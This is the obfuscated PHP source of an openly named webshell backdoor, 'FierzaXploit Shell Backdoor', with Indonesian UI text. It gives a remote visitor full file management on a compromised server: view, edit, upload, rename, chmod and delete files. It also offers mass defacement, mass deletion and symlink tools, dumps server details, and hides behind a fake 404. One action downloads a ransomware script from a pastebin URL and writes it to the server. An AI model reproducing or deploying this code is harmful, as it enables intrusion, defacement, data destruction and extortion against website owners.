"\42\x20\143\x6c\x61\163\163\x3d\42\146\157\x72\155\55\143\x6f\156\x74\162\x6f\154\x22\x20\151\144\75\x22\x65\170\141\x6d\x70\x6c\x65\x46\x6f\162\x6d\103\x6f\x6e\164\162\x6f\x6c\x49\x6e\160\x75\x74\61\x22\x20\x70\154\141\143\x65\150\x6f\x6c\x64\145\x72\x3d\x22\156\x61\x6d\x65\x40\x65\170\141\x6d\x70\x6c\x65\56\x63\x6f\x6d\42\x3e\x20\74\57\144\151\166\76\x20\x3c\142\162\76\x20\x3c\x62\165\x74\164\x6f\156\40\x74\x79\160\x65\x3d\x22\x73\165\x62\155\151\164\x22\x20\x6e\x61\x6d\x65\75\42\x67\141\x6e\x74\151\42\40\x63\154\141\163\163\x3d\42\x74\x6f\155\x62\157\154\x20\142\x74\x6e\x20\142\164\x6e\55\157\x75\x74\154\x69\156\145\55\163\165\x63\143\x65\x73\163\x22\76\x47\x61\x6e\164\151\x20\x50\145\x72\x6d\151\x73\163\151\157\156\74\x2f\x62\165\x74\164\157\x6e\x3e\x20\x3c\57\x66\157\x72\x6d\76\40\x3c\x62\162\x3e\74\142\162\76\x20\x3c\142\x75\164\164\x6f\156\40\x74\171\160\x65\75\42\x62\165\x74\164\157\x6e\x22\40\143\154\x61\x73\163\x3d\x22\x74\x6f\155\142\x6f\154\x20\x62\164\x6e\x20\142\x74\156\55\144\x61\x6e\147\x65\162\x22\x20\x64\x61\164\x61\55\x62\163\55\x64\151\x73\155\151\163\163\75\x22\x61\x6c\x65\162\x74\x22\x20\x61\x72\151\141\x2d\x6c\x61\x62\x65\x6c\x3d\42\103\154\157\x73\145\42\x3e\103\x61\156\143\145\x6c\74\x2f\x62\x75\164\164\157\156\76\40\74\x2f\x64\x69\x76\x3e";
} goto Rn05R;
IorZ4: $paths = explode("\x2f", $path);
goto uqYo2;
nh8w_: function perms($file) { $perms = fileperms($file);
if (($perms & 49152) == 49152) { $info = "\x73";
} elseif (($perms & 40960) == 40960) { $info = "\x6c";
} elseif (($perms & 32768) == 32768) { $info = "\55";
} elseif (($perms & 24576) == 24576) { $info = "\142";
} elseif (($perms & 16384) == 16384) { $info = "\144";
} elseif (($perms & 8192) == 8192) { $info = "\143";
} elseif (($perms & 4096) == 4096) { $info = "\x70";
} else { $info = "\x75";
} $info .= $perms & 256 ? "\162" : "\x2d";
$info .= $perms & 128 ? "\167" : "\x2d";
$info .= $perms & 64 ? $perms & 2048 ? "\x73" : "\170" : ($perms & 2048 ? "\x53" : "\x2d");
$info .= $perms & 32 ? "\x72" : "\55";
$info .= $perms & 16 ? "\x77" : "\x2d";
$info .= $perms & 8 ? $perms & 1024 ? "\163" : "\x78" : ($perms & 1024 ? "\x53" : "\x2d");
$info .= $perms & 4 ? "\162" : "\55";
$info .= $perms & 2 ? "\x77" : "\x2d";
$info .= $perms & 1 ? $perms & 512 ? "\x74" : "\170" : ($perms & 512 ? "\124" : "\x2d");
return $info;
} goto B9Mtr;
cLP65: ifBFV: goto XxW0A;
eiA1e: boQRQ: goto J933R;
ixusX: if (!empty($_GET["\x70\x61\164\x68"])) { chdir($_GET["\160\141\x74\x68"]);
} goto W9V0V;
B9Mtr: goto UWzQG;
goto dhclf;
PV003: z5WeP: goto Hoewp;
D4tz1: D2lid: goto IptFT;
S4peE: echo "\x3c\160\40\143\x6c\141\x73\x73\x3d\42\x68\x6f\x6d\145\42\76\74\141\40\143\154\141\163\x73\75\x22\x6c\x69\156\153\156\x79\x61\x22\x20\150\x72\x65\x66\x3d\42\77\x68\157\155\x65\42\76\173\x48\x6f\x6d\x65\40\x7d\x3c\x2f\x61\x3e\x3c\x2f\160\x3e";
goto A5_JB;
Nvrz7: ut1ym: goto EtjOg;
ziddK: goto TVTRq;
goto Nvrz7;
JAl6s: wZKeE: goto WuftL;
zbBRb: if (isset($_GET["\160\141\164\150"])) { $path = $_GET["\x70\141\x74\x68"];
} else { $path = getcwd();
} goto vHTML;
NbROV: echo "\x3c\x61\x20\143\154\x61\x73\163\x3d\42\144\x72\157\160\x64\157\x77\156\x2d\x69\164\x65\x6d\x22\40\x68\x72\145\x66\75\42\x3f\160\x61\x74\x68\x3d" . $path . "\x26\x61\x6b\x73\x69\x3d\x6d\141\x73\x73\144\x65\x66\141\143\145\x22\76\x4d\141\163\163\40\x44\145\x66\x61\143\145\74\57\141\76";
goto F73IM;
C9Nhm: foreach ($scandir as $file) { if ($file != "\x2e" && $file != "\56\x2e") { if (is_file($file)) { echo "\x3c\x74\x72\76\40\x3c\164\150\x20\x73\x63\157\x70\x65\75\x22\x72\157\x77\42\76\74\146\x6f\x6e\x74\40\x73\x69\x7a\145\75\47\x35\x27\76\74\x69\x20\143\154\141\x73\163\x3d\x22\x62\151\40\x62\x69\55\146\x69\154\145\x2d\x65\141\x72\x6d\x61\162\x6b\x2d\143\x6f\144\x65\x2d\x66\x69\x6c\154\x22\76\x3c\x2f\x69\x3e\74\x2f\146\157\156\164\76\x3c\57\x74\150\x3e\40\74\164\144\x3e\x20\74\141\40\143\x6c\x61\x73\163\x3d\x22\160\x61\164\x68\x22\40\x6e\141\155\x61\75\47\x66\151\154\145\156\x79\141\x27\40\150\162\x65\146\x3d\42\77\160\141\x74\x68\x3d" . $path . "\46\141\x6b\163\x69\75\166\151\145\x77\x26\160\x61\164\x68\137\146\x69\154\145\75" . $path . "\57" . $file . "\x22\x3e" . $file . "\74\57\x61\76\x20\x3c\x2f\164\x64\76\40\x3c\164\x64\x3e";
if (is_writable($path . "\57" . $file)) { echo "\x3c\146\157\x6e\164\40\x63\157\x6c\157\162\75\42\x23\x32\105\x46\x46\x30\60\42\76";
} elseif (!is_readable($path . "\x2f" . $file)) { echo "\x3c\146\157\x6e\x74\40\143\x6f\154\x6f\x72\75\x22\x23\106\x46\x35\67\x33\x33\42\76";
} echo perms($path . "\x2f" . $file);
if (is_writable($path . "\57" . $file) || !is_readable($path . "\57" . $file)) { echo "\x3c\x2f\146\x6f\x6e\x74\76";
} echo "\74\x2f\164\144\76\x20\74\164\144\76\40\x3c\141\40\150\162\145\146\75\x27\x3f\x70\x61\x74\x68\75" . $path . "\x26\141\153\x73\x69\75\x65\144\151\164\x26\144\x69\162\146\75" . $path . "\x2f" . $file . "\46\x6e\141\x6d\x61\x5f\146\151\154\x65\75" . $file . "\x27\x20\x63\x6c\141\163\163\75\42\142\164\156\40\x62\164\156\55\157\165\x74\x6c\151\x6e\145\55\163\165\x63\143\145\163\x73\42\76\74\151\x20\x63\154\x61\x73\x73\75\42\x62\x69\40\x62\151\55\160\145\x6e\143\x69\x6c\x2d\163\x71\165\x61\162\145\42\76\x3c\57\151\x3e\x3c\57\141\x3e\40\x3c\x61\40\150\x72\145\x66\75\47\77\x70\x61\x74\x68\75" . $path . "\46\x61\x6b\163\151\75\162\x65\156\141\x6d\x65\46\144\151\162\146\75" . $path . "\x2f" . $file . "\46\x6e\141\x6d\x61\x5f\146\x69\154\145\x3d" . $file . "\47\40\x63\154\141\x73\x73\75\x22\142\164\156\40\142\x74\156\x2d\157\x75\x74\x6c\x69\156\x65\x2d\167\141\162\x6e\151\x6e\147\42\x3e\74\x69\x20\143\x6c\x61\x73\x73\x3d\42\x62\x69\x20\142\151\55\160\145\156\x63\x69\x6c\42\76\74\x2f\x69\76\74\x2f\x61\x3e\40\x3c\x61\40\x68\x72\x65\146\75\47\77\160\x61\164\x68\75" . $path . "\x26\x61\x6b\x73\x69\75\x63\x68\155\157\144\46\x64\151\x72\146\x3d" . $path . "\x2f" . $file . "\46\156\x61\x6d\141\x5f\x66\x69\154\x65\75" . $file . "\x27\x20\x63\154\x61\x73\163\75\42\x62\164\x6e\x20\142\x74\156\x2d\157\165\164\x6c\151\156\x65\55\x6c\x69\x67\150\x74\x22\76\x3c\151\x20\143\x6c\x61\163\163\75\x22\x62\x69\x20\x62\151\55\x63\165\x72\x73\157\162\x2d\x66\151\x6c\x6c\42\76\x3c\x2f\x69\x3e\74\x2f\x61\76\40\74\141\x20\150\x72\145\x66\x3d\47\x3f\x70\141\x74\x68\75" . $path . "\x26\141\x6b\163\x69\x3d\144\145\154\x65\x74\145\46\144\151\162\146\75" . $path . "\x2f" . $file . "\46\x6e\141\x6d\x61\x5f\x66\x69\x6c\145\x3d" . $file . "\x27\x20\143\x6c\141\163\163\75\42\142\x74\156\x20\142\164\156\x2d\x6f\x75\164\x6c\x69\x6e\145\x2d\x64\x61\x6e\x67\145\162\x22\76\x3c\151\40\x63\x6c\141\x73\x73\75\x22\x62\x69\40\x62\x69\x2d\164\162\141\163\x68\55\x66\151\x6c\154\42\x3e\x3c\x2f\151\x3e\74\x2f\x61\x3e\x20\74\x2f\164\144\76\x20\x3c\x2f\x74\x72\x3e";
} } } goto t1EEk;
Xks96: goto GSbYH;
goto HPrZx;
Dazrs: if (isset($_GET["\160\141\x74\x68\x5f\x66\151\x6c\x65"])) { $lihat = $_GET["\x70\x61\x74\150\x5f\146\151\x6c\145"];
} goto XoW0k;
uqYo2: goto Dj2VZ;
goto YjoII;
Sw8t6: goto JqRah;
goto ey9Tt;
sAzXs: goto JxNsu;
goto zWXy7;
Y4BNk: ?>
</li> <li> <?php goto FjoTC;
jF2FQ: goto ut1ym;
goto zSzYi;
Hoewp: if ($_GET["\x61\x6b\163\151"] == "\166\x69\145\x77") { echo "\74\144\151\166\40\x63\154\x61\x73\x73\x3d\47\141\x6c\x65\x72\x74\x27\x3e\x3c\x62\x75\164\x74\157\156\x20\x74\x79\x70\145\x3d\42\142\165\x74\x74\x6f\156\x22\x20\x63\x6c\141\x73\x73\x3d\x22\x62\x74\156\x20\142\x74\156\x2d\144\x61\x6e\x67\145\x72\x22\40\x64\x61\x74\x61\55\142\x73\x2d\144\151\x73\155\151\x73\x73\x3d\x22\141\x6c\x65\162\164\42\40\141\162\x69\141\x2d\154\x61\x62\x65\x6c\75\x22\103\154\x6f\163\x65\42\76\x3c\x69\x20\x63\x6c\141\x73\163\75\x22\142\x69\x20\142\151\x2d\170\55\154\x67\42\76\74\x2f\x69\x3e\74\x2f\x62\x75\164\x74\x6f\156\x3e\74\x63\145\156\164\x65\162\76\74\x74\145\170\164\141\162\x65\x61\x20\x63\154\141\163\x73\75\x22\x66\157\162\155\55\x63\x6f\x6e\164\x72\157\154\40\160\x72\145\164\x74\x79\120\162\151\156\x74\x22\x20\x69\x64\75\42\x65\170\x61\155\160\x6c\x65\x46\x6f\x72\x6d\x43\x6f\x6e\x74\162\x6f\154\x54\x65\170\164\x61\162\x65\141\61\42\x20\x72\157\167\x73\75\x22\62\x30\x22\x20\144\x69\x73\x61\x62\154\145\x64\x3e" . htmlspecialchars(file_get_contents($lihat)) . "\x3c\57\164\145\x78\x74\x61\162\x65\x61\x3e\74\x2f\143\x65\156\x74\145\x72\76\74\x2f\144\151\166\x3e";
} goto exB7J;
XQB_K: goto dStM1;
goto xDPWm;
k9_qn: sr1jj: goto Csfjc;
wTLL7: $scandir = scandir($path);
goto CsyHM;
W9V0V: goto aMmZL;
goto QWcEH;
FF9z1: Bec33: goto VcNbZ;
exB7J: goto SyNz4;
goto RQoJM;
NHUP1: vM0sT: goto C99NJ;
Kgiy1: krG0X: goto NbROV;
MCkMB: qtcK6: goto Ybt26;
Z1imX: set_time_limit(0);
goto luNKG;
zvSdf: goto jXWMb;
goto JDWNg;
VOmNo: echo "\40\x3c\141\40\x63\154\141\163\x73\75\x22\x69\156\146\x6f\x72\155\x61\x74\x69\x6f\x6e\x2d\x73\145\x72\166\145\162\x20\164\145\170\x74\x2d\144\x65\x63\x6f\162\141\x74\x69\157\156\x2d\x6e\157\156\145\40\x74\x65\x78\164\x2d\x77\x68\151\164\x65\40\x74\145\x78\164\x2d\x73\x74\141\x72\x74\40\x62\x67\x2d\144\141\x72\153\42\x20\x64\141\164\x61\x2d\x62\163\x2d\164\x6f\x67\147\154\145\x3d\42\143\157\154\154\141\160\163\x65\x22\x20\x68\162\x65\146\75\x22\43\x63\x6f\x6c\154\x61\x70\163\x65\x45\x78\141\x6d\x70\154\x65\x22\x20\162\157\154\145\75\42\142\165\x74\x74\x6f\x6e\x22\40\x61\162\151\x61\55\x65\x78\160\x61\x6e\x64\145\144\x3d\42\146\x61\x6c\x73\145\x22\40\x61\162\151\141\x2d\x63\157\156\164\x72\157\x6c\x73\x3d\x22\143\157\154\x6c\141\160\x73\x65\x45\170\141\x6d\160\x6c\145\42\76\40\74\160\x3e\74\151\40\x63\154\x61\x73\x73\x3d\42\142\151\40\x62\x69\x2d\151\x6e\146\157\55\x63\x69\162\143\x6c\x65\55\146\x69\x6c\x6c\x22\76\74\57\151\x3e\40\111\156\146\157\162\155\141\x74\151\157\156\x20\x53\145\x72\x76\145\x72\40\x3c\x69\40\x63\154\x61\163\163\75\42\142\151\x20\x62\151\55\x63\150\x65\166\x72\157\x6e\x2d\x64\157\167\x6e\42\x3e\x3c\57\x69\76\74\57\x70\x3e\40\74\x2f\x61\x3e\40\74\x64\x69\x76\40\x63\154\x61\x73\163\75\42\x63\157\154\154\141\x70\x73\x65\42\40\151\x64\x3d\x22\x63\157\x6c\154\x61\x70\x73\145\x45\170\141\155\x70\x6c\145\42\76\x20\x3c\144\x69\x76\40\143\x6c\x61\163\163\x3d\x22\143\x61\x72\144\40\143\141\x72\x64\x2d\x62\x6f\x64\x79\40\142\147\55\x64\x61\x72\153\42\x3e\x20\74\144\x69\166\40\x63\154\x61\x73\163\x3d\42\x74\x65\x78\164\x2d\x77\x68\x69\164\x65\x20\142\147\55\x64\x61\x72\153\40\x74\141\x62\x6c\x65\x6e\x79\x61\x22\x3e\40\x3c\154\151\x3e\127\x65\142\163\x69\164\145\x20\72\x20" . $_SERVER["\x53\x45\122\126\105\x52\137\x4e\101\x4d\105"] . "\74\57\154\151\x3e\x20\x3c\154\151\x3e\x49\160\x20\101\144\144\x72\145\163\x73\x20\72\40" . $_SERVER["\x53\x45\122\x56\105\122\x5f\x41\104\x44\122"] . "\x3c\57\x6c\x69\x3e\x20\74\x6c\x69\x3e\120\157\x72\x74\40\72\x20" . $_SERVER["\123\105\x52\x56\105\122\137\x50\117\x52\x54"] . "\x3c\57\x6c\x69\76\40\74\154\151\x3e\x4b\145\x72\156\x65\x6c\40\x3a\40" . php_uname() . "\x3c\x2f\154\x69\76\40\x3c\154\151\76\x50\162\157\164\157\x6b\x6f\x6c\40\x3a\40" . $_SERVER["\x53\105\x52\126\x45\x52\x5f\x50\x52\x4f\x54\x4f\103\x4f\x4c"] . "\x3c\x2f\x6c\151\x3e\40\74\154\151\x3e\123\141\x76\x65\x20\x44\141\164\141\x20\x3a\40" . $_SERVER["\x48\124\124\x50\x5f\123\x41\x56\x45\x5f\x44\x41\124\x41"] . "\74\x2f\x6c\x69\76\x20\74\x6c\x69\x3e\x4b\x6f\x6e\145\153\163\x69\40\72\40" . $_SERVER["\x48\x54\124\x50\x5f\x43\x4f\116\116\x45\x43\124\111\117\x4e"] . "\x3c\x2f\154\x69\x3e\40\74\x6c\151\76\x53\145\162\166\145\162\40\x3a\40" . $_SERVER["\123\105\x52\x56\105\122\137\x53\117\x46\x54\127\101\122\105"] . "\x3c\57\154\151\76\x20\x3c\154\151\x3e\x52\157\157\164\x20\72\x20" . $_SERVER["\104\117\x43\x55\x4d\105\x4e\124\137\122\x4f\117\x54"] . "\74\x2f\154\x69\x3e\x20\x3c\154\151\x3e\x47\x2d\x49\x6e\164\x65\162\146\141\143\145\x20\72\x20" . $_SERVER["\107\101\x54\105\127\101\x59\x5f\111\x4e\x54\x45\122\106\101\x43\x45"] . "\x3c\x2f\x6c\x69\x3e\x20\x3c\154\x69\76\x52\55\x4d\145\x74\150\157\144\40\x3a\40" . $_SERVER["\x52\x45\121\125\105\x53\124\x5f\115\105\x54\x48\x4f\104"] . "\x3c\57\154\151\76\x20";
goto pYHSB;
O7Une: Dj2VZ: goto Z2kIu;
hfxx6: foreach ($scandir as $direktori) { if ($direktori != "\56" && $direktori != "\x2e\x2e") { if (is_dir($direktori)) { echo "\74\x74\162\x3e\x20\x3c\x74\150\40\x73\x63\157\160\145\x3d\x22\x72\157\167\x22\76\74\146\157\x6e\x74\x20\x73\151\172\145\x3d\47\65\47\76\74\151\x20\x63\x6c\x61\163\163\75\42\x62\151\40\142\x69\x2d\x66\157\154\144\x65\x72\55\x66\151\154\154\x22\x3e\74\57\151\x3e\x3c\x2f\x66\x6f\x6e\164\76\74\57\x74\150\76\x20\x3c\164\144\76\x3c\x61\x20\143\154\x61\163\163\75\x22\160\141\164\x68\x22\x20\x6e\141\155\x61\x3d\47\146\x69\x6c\x65\x6e\171\x61\x27\40\150\x72\145\146\75\42\77\160\x61\x74\150\75" . $path . "\57" . $direktori . "\x22\76" . $direktori . "\74\57\x61\76\x3c\x2f\x74\144\x3e\x20\74\164\144\x3e";
if (is_writable($path . "\57" . $direktori)) { echo "\74\x66\157\x6e\164\x20\x63\x6f\x6c\x6f\x72\75\x22\43\x32\105\x46\x46\60\60\42\x3e";
} elseif (!is_readable($path . "\57" . $direktori)) { echo "\x3c\146\x6f\x6e\x74\40\x63\157\154\157\x72\x3d\x22\43\106\106\65\x37\x33\63\x22\76";
} echo perms($path . "\x2f" . $direktori);
if (is_writable($path . "\x2f" . $direktori) || !is_readable($path . "\x2f" . $direktori)) { echo "\74\57\146\x6f\x6e\164\x3e";
} echo "\x3c\x2f\x74\x64\76\40\74\x74\144\76\x20\x3c\141\x20\150\162\x65\x66\x3d\x27\77\160\x61\x74\x68\x3d" . $path . "\46\141\153\x73\151\x3d\x72\145\x6e\x61\155\x65\x26\x64\x69\162\146\x3d" . $path . "\x2f" . $direktori . "\46\156\141\155\x61\x5f\146\151\154\145\x3d" . $direktori . "\x27\40\143\154\x61\x73\163\x3d\x22\x62\x74\156\40\x62\164\156\x2d\157\x75\x74\154\x69\x6e\145\x2d\x77\141\162\x6e\151\x6e\x67\x22\76\74\x69\x20\x63\x6c\x61\x73\163\x3d\42\142\151\40\x62\x69\55\x70\145\156\x63\x69\154\x22\76\x3c\57\151\76\74\57\141\76\x20\x3c\141\x20\x68\x72\145\x66\x3d\x27\x3f\160\x61\x74\x68\x3d" . $path . "\x26\x61\x6b\163\151\75\143\x68\155\157\144\x26\144\151\162\146\x3d" . $path . "\57" . $direktori . "\46\x6e\x61\155\141\137\x66\151\x6c\x65\x3d" . $direktori . "\47\40\x63\x6c\x61\163\163\75\x22\142\x74\156\40\142\164\156\55\157\x75\x74\154\151\x6e\145\55\x6c\x69\x67\150\x74\42\x3e\74\151\40\x63\154\141\163\x73\75\x22\142\151\x20\x62\151\x2d\143\x75\x72\163\x6f\x72\x2d\x66\x69\154\x6c\x22\76\x3c\57\x69\76\74\57\141\x3e\x20\74\x61\40\x68\162\x65\146\x3d\x27\77\160\141\164\x68\75" . $path . "\46\141\153\163\x69\75\144\x65\x6c\x65\x74\x65\x26\144\x69\x72\x66\75" . $path . "\x2f" . $direktori . "\46\x6e\141\x6d\141\137\x66\x69\154\145\75" . $direktori . "\x27\x20\143\154\141\x73\x73\75\x22\142\164\x6e\40\x62\x74\156\55\x6f\x75\x74\x6c\x69\156\x65\x2d\x64\141\156\x67\145\162\x22\76\x3c\x69\40\143\154\141\163\163\x3d\42\x62\x69\x20\142\x69\x2d\164\162\x61\x73\x68\55\146\151\x6c\154\42\x3e\x3c\x2f\x69\x3e\x3c\x2f\141\76\x20\x3c\57\164\144\x3e\x20\x3c\x2f\164\x72\x3e";
} } } goto uGQc2;
n_8YG: goto rVp60;
goto jVoof;
N4ulc: goto iY62q;
goto AXcgL;
ggFSH: NiTi4: goto a7kqj;
CWGHy: dStM1: goto sI5sQ;
WuftL: echo "\40\x3c\x66\157\x6e\164\40\x77\x69\144\x74\x68\75\x27\x31\65\x25\x27\x3e\x3c\x61\x20\x63\x6c\x61\163\163\75\x22\x62\x74\156\40\x62\164\x6e\55\157\165\164\x6c\x69\156\145\55\163\165\x63\143\145\x73\x73\x22\76\74\151\40\143\154\x61\x73\x73\75\x22\142\x69\x20\x62\151\55\x70\x65\x6e\x63\x69\154\55\x73\x71\165\x61\x72\145\x22\76\74\57\x69\x3e\x3c\x2f\141\76\40\72\40\x45\x64\151\x74\40\x46\151\154\145\x3c\x2f\x66\x6f\156\164\76\x20\74\146\x6f\156\x74\x20\x77\151\144\x74\150\x3d\47\61\x35\x25\47\76\x3c\x61\x20\143\x6c\x61\163\x73\75\x22\x62\164\156\40\142\x74\156\x2d\x6f\165\x74\154\151\x6e\x65\55\167\x61\162\156\151\156\147\x22\76\x3c\x69\x20\143\154\141\x73\163\75\42\142\151\x20\142\x69\55\x70\x65\x6e\x63\x69\154\x22\76\74\x2f\151\76\x3c\57\x61\x3e\40\x3a\x20\162\x65\156\x61\x6d\145\40\106\x69\x6c\145\74\57\146\x6f\x6e\164\x3e\x20\74\146\157\156\164\40\x77\151\x64\x74\x68\x3d\47\x31\65\x25\47\76\x3c\x61\x20\x63\154\141\163\163\75\42\x62\x74\156\40\x62\164\156\x2d\x6f\165\164\x6c\x69\156\x65\x2d\154\x69\147\150\x74\42\x3e\x3c\151\x20\143\x6c\141\163\x73\75\42\x62\151\x20\x62\x69\55\x63\x75\162\x73\x6f\x72\55\146\x69\x6c\154\42\x3e\x3c\57\x69\76\x3c\x2f\x61\76\40\x3a\40\103\150\x6d\x6f\x64\40\x46\151\154\x65\74\57\x66\x6f\x6e\x74\76\x20\x3c\146\x6f\156\x74\x20\167\x69\144\x74\150\x3d\47\x31\65\45\47\76\x3c\141\40\143\154\x61\163\x73\75\42\142\164\156\40\142\x74\156\x2d\157\x75\x74\x6c\151\156\x65\x2d\x64\141\x6e\147\x65\x72\x22\76\74\151\x20\x63\x6c\x61\163\163\x3d\42\142\x69\40\x62\x69\x2d\x74\x72\x61\163\x68\55\146\151\154\x6c\x22\x3e\x3c\57\151\x3e\x3c\x2f\141\76\40\72\40\104\x65\x6c\x65\164\x65\40\x46\x69\x6c\x65\74\x2f\x66\157\156\164\x3e\40";
goto gmSid;
hWKWE: UPaVK: goto OuGV8;
j70eg: AGQ7r: goto uJEM8;
KFC7Z: FKIcX: goto D3IVi;
zWXy7: JqRah: goto YHCZ1;
VpPyx: goto ZusWR;
goto Mpn4G;
WAgQg: goto wPmco;
goto CJtzJ;
C99NJ: ?>
</div> </div> </caption> </table> <a href="#up"><i class="bi bi-chevron-up up-icon"></i></a> </div> </div> <!-- akhir list file/folder --> <br> <div class="footer"> <center> <?php goto sT0Km;
RQoJM: wPmco: goto oWvqN;
zT5IZ: echo "\x3c\x61\40\x63\154\141\163\x73\75\x22\x64\x72\157\x70\144\x6f\167\x6e\55\151\x74\x65\155\x22\x20\x68\162\145\x66\75\42\x3f\x70\x61\164\150\75" . $path . "\x26\141\153\163\x69\75\x73\171\155\x6c\x69\x6e\153\x22\76\123\x79\x6d\x6c\151\x6e\x6b\74\57\x61\x3e";
goto ziddK;
Pm5Bg: goto WDevt;
goto uZ2py;
Z2kIu: echo "\74\x70\40\x63\154\x61\163\x73\x3d\x27\164\x75\154\x69\x73\x61\x6e\x20\x74\x61\x62\x6c\x65\156\x79\x61\x27\x3e\74\x69\x20\163\x69\172\x65\x3d\x27\61\65\47\40\x63\x6c\141\x73\x73\75\42\x70\141\x74\150\x6e\171\141\40\142\x69\40\x62\x69\55\146\x6f\154\x64\x65\x72\62\x2d\x6f\160\x65\156\x22\76\x3c\x2f\151\x3e\x20\x3a\40\x7e\40";
goto DHpGE;
AafvC: ohgyw: goto yVK2Z;
J933R: echo "\74\x61\x20\143\154\141\x73\x73\x3d\42\144\162\157\x70\x64\x6f\x77\156\x2d\151\164\145\155\42\x20\x68\162\145\x66\x3d\42\x3f\x70\x61\164\x68" . $path . "\x26\141\x6b\163\x69\75\155\141\x73\x73\144\145\154\x22\76\115\141\163\x73\x20\x44\x65\x6c\145\164\145\74\57\x61\x3e";
goto s2CZX;
a7kqj: header("\130\x2d\130\x53\x53\55\120\x72\157\x74\x65\x63\164\151\x6f\156\72\x20\60");
goto N4ulc;
HPrZx: Yp2Rw: goto bK3Zu;
iJL_x: goto oSCCZ;
goto aLb0r;
uGQc2: goto QW2AR;
goto pyHpb;
pYHSB: goto FKIcX;
goto XjuP4;
eRzg6: goto boQRQ;
goto z4nNL;
EtjOg: http_response_code(404);
goto etrN_;
VcNbZ: browsernya();
goto g40jp;
lkO2O: ?>
</tbody> <caption> <a class="btn btn-dark" data-bs-toggle="collapse" href="#collapseExample1" role="button" aria-expanded="false" aria-controls="collapseExample"> <i class="bi bi-question-circle"></i> Legends <i class="bi bi-chevron-down"></i> </a> <div class="collapse" id="collapseExample1"> <div class="card card-body bg-dark text-white"> <?php goto oLCZa;
luNKG: goto AL7F1;
goto MCkMB;
O5nm1: goto kADJW;
goto eiA1e;
n8F9Q: goto P0QKh;
goto Kgiy1;
t550g: error_reporting(0);
goto jF2FQ;
CJtzJ: QArCp: goto Dazrs;
etrN_: goto ifBFV;
goto D4tz1;
q72sG: goto JDEDT;
goto yskXd;
saviH: JxNsu: goto kopA0;
l9LlZ: pJJz_: goto i902r;
QH3W5: if ($_GET["\x61\153\163\x69"] == "\142\x75\x61\164\x72\x61\156\x73\157\155") { $url = "\150\164\x74\x70\163\x3a\x2f\57\x70\141\x73\164\145\142\151\x6e\x2e\x63\157\155\x2f\162\x61\x77\57\114\142\x56\150\116\x6e\x5a\x46";
$curl = curl_init($url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$get = curl_exec($curl);
if ($get != '') { $puts = fopen("\x52\x61\156\163\x6f\155\127\x65\x62\56\160\x68\160", "\167");
fwrite($puts, $get);
fclose($puts);
$nama_file = "\x52\141\156\163\x6f\155\127\145\142\56\x70\150\x70";
$server_web = "\150\x74\164\160\72\57\x2f" . $_SERVER["\x48\124\124\x50\137\110\x4f\x53\124"] . "\57";
if ($puts != '') { echo "\74\x73\143\x72\151\160\164\x3e\x77\x69\x6e\x64\157\167\x2e\154\x6f\x63\141\164\x69\x6f\x6e\x3d\47\77\160\x61\164\150\75" . $path . "\x27\73\x61\x6c\145\x72\x74\50\x27\x53\x75\x6b\163\x65\x73\x27\51\74\x2f\x73\x63\x72\151\160\164\x3e";
} else { echo "\107\141\x67\x61\x6c\x20\115\145\155\142\165\141\x74\x20\x46\x69\x6c\x65";
} } } goto q72sG;
aLb0r: AL7F1: goto t550g;
cMYHn: goto qTXxQ;
goto CWGHy;
dhclf: haaxP: goto zT5IZ;
JDWNg: FY1gj: goto tpRGg;
bK3Zu: if (isset($_POST["\x62\x74\x6e"])) { $nama = $_FILES["\165\160\154"]["\156\141\155\145"];
$lokasi = $_FILES["\x75\160\x6c"]["\164\155\x70\137\x6e\x61\x6d\145"];
$folder = '';
if (move_uploaded_file($lokasi, $folder . $nama)) { echo "\x3c\x73\143\162\151\x70\164\x3e\163\x77\x61\x6c\x28\x22\x42\145\x72\150\141\163\151\x6c\x20\x55\x70\154\x6f\x61\144\x21\x21\41\42\54\40\42\x53\x65\154\x61\155\x61\x74\40\x61\x6e\x64\x61\x20\x42\151\x73\x61\40\x4d\x65\156\x67\x75\160\154\157\x61\x64\40\x46\151\x6c\145\42\54\40\42\163\165\x63\x63\x65\x73\163\x22\51\x3b\74\x2f\163\143\162\x69\160\164\x3e";
} else { echo "\x3c\x73\143\x72\x69\x70\x74\76\40\163\x77\x61\154\x28\42\x47\x61\147\x61\x6c\40\125\x70\x6c\157\x61\144\x21\x21\x21\x22\54\40\x22\115\141\x61\146\x20\x54\x69\144\x61\x6b\40\102\x69\x73\141\x20\x55\160\x6c\x6f\141\x64\x20\106\x69\154\145\x22\x2c\40\x22\145\162\162\157\162\42\51\73\74\x2f\163\143\162\151\160\x74\76";
} } goto fPtSX;
F73IM: goto AGQ7r;
goto KFC7Z;
ylXBo: ?>
</li> </ul> </div> <a class="btn btn-light" data-bs-toggle="collapse" href="#multiCollapseExample1" role="button" aria-expanded="false" aria-controls="multiCollapseExample1"><i class="bi bi-info-circle"></i> About Shell</a> <div class="col"> <div class="collapse multi-collapse" id="multiCollapseExample1"> <div class="card card-body"> <b>FierzaXploit Shell Backdoor</b><hr> <p> Adalah shell bypass dengan UI Yang apik & Responsive, Cocok digunakan untuk anda yang<br> tidak memiliki laptop/personal komputer.<br>Author : FierzaXploit/Mr.MF33</p> </div> </div> </div> <br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br> <hr class="pembatas"> <p><i class="bi bi-check-circle"></i> Version Webshell : 1.1(Realese)</p> </div> </div> </div> </nav> <!-- akhir navbar --> <!-- list file/folder --> <div class="container-fluid"> <div class="row"> <?php goto evrxU;
s2CZX: goto AauIZ;
goto k9_qn;
lYoN0: if ($_GET["\x61\153\163\151"] == "\x62\165\141\x74\x66\157\x6c\x64\145\162") { if (isset($_POST["\x66\157\154\x64\145\x72\163\163"])) { $folder = $_POST["\x6e\x61\155\141\106"];
$nama_folder = $path . "\x2f" . $folder;
$buat_folder = mkdir($nama_folder);
if ($buat_folder) { echo "\x3c\163\143\x72\x69\x70\x74\76\x77\151\x6e\144\x6f\167\x2e\x6c\157\143\141\164\x69\157\x6e\75\47\77\x70\141\164\x68\x3d" . $path . "\47\x3b\x61\154\145\162\x74\x28\47\106\x6f\154\x64\145\162\x20\123\165\x6b\163\x65\x73\40\x44\151\142\x75\x61\x74\41\47\x29\x3c\x2f\163\x63\162\151\160\x74\x3e";
